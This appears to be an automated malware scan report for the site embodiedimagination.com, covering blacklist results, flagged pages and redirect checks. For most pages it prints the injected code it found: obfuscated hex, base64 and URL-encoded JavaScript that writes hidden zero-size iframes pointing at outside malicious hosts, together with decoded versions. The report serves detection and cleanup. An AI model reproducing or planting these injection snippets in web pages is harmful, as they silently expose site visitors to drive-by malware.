Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=embodiedimagination.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://embodiedimagination.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.embodiedimagination.com/ | 200 OK Content-Length: 8410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/index.htm | 200 OK Content-Length: 8410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/foundingmembers.htm | 200 OK Content-Length: 8297 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/thesociety.htm | 200 OK Content-Length: 10857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var VxYa="PGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ2VzaWNodGVyLmNvbS9vay5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var Fu8Y="";var yYkX,mVyN,CZrD,cjBs,q1EF,TP0c,ghDn="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;VxYa=VxYa.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{cjBs=k0e0y0S.indexOf(VxYa.charAt(i++));q1EF=k0e0y0S.indexOf(VxYa.charAt(i++));TP0c=k0e0y0S.indexOf(VxYa.charAt(i++));ghDn=k0e0y0S.indexOf <iframe src="http://2gesichter.com/ok.php" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://www.embodiedimagination.com/linksofinterest.htm | 200 OK Content-Length: 9801 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6C%6F%76%65%70%70%74%2E%63%6E%2F%6C%6E%6B%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://iloveppt.cn/lnk.php" width="1" height="1"></iframe> Antivirus reports:
| ||
http://cleantds.in/coupe.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://cleantds.in/test404page.js | 500 Can't connect to cleantds.in:80 Content-Length: 186 Content-Type: text/plain | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://www.embodiedimagination.com/contactus.htm | 200 OK Content-Length: 8068 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6C%6F%76%65%70%70%74%2E%63%6E%2F%6C%6E%6B%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://iloveppt.cn/lnk.php" width="1" height="1"></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: embodiedimagination.com
Result:
GET / HTTP/1.1
Host: embodiedimagination.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: embodiedimagination.com
Referer: http://www.google.com/search?q=embodiedimagination.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: embodiedimagination.com
Referer: http://www.google.com/search?q=embodiedimagination.com
Result:
The result is similar to the first query. There are no suspicious redirects found.